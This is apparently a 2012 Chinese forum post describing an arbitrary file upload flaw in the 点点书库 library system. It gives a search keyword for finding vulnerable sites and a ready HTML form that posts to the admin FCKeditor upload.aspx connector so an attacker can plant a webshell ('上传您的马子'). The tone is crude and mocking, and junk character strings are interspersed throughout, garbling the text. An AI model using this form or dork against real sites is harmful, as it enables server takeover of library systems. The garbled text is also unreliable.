主题:图书馆系统任意文件上传漏洞( q& _ o- H& y6 o: L
作者:冰锋刺客
% Q5 ]" Z6 y; T- U6 l/ W* V# D 厂商:点击书(dianjishu.com)
& o& E$ h: G8 Z* j5 e) A% e8 ` 日期:2012-6-21
{3 m3 r8 `' c# u* J) R 3 L2 _' }6 e7 ?1 J9 ]8 S
I 概述4 r2 j$ U8 ~9 R5 g
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell. R0 ?: U- Z" Z1 _
II 简介( L/ ]# D: I; X' R( h. e2 ~
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
+ U; g( e" P' g7 O0 ` 补充一个漏洞
0 R5 k/ \8 m+ o1 u <form id="frmUpload" enctype="multipart/form-data"2 z" q0 M. m; B0 W! N' j
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
, ^/ v9 ^" C5 l' [ <input id="btnUpload" type="submit" value="操翻他">" V% \' h7 Z& p! e& O. w) ~
</form>4 p; v' ]$ c; P' R
你们懂的
9 K1 t" [# T; Y: l+ ^! @& G 那傻逼提供还需要改包.$ v/ ~/ s8 G2 b: i
自己看了下源代码发现fckeditor
1 C) ?& D/ Q3 I+ |7 S, S' s9 S) D 直接秒杀4 i, L( ~# ]8 C4 S @8 o+ D9 a
|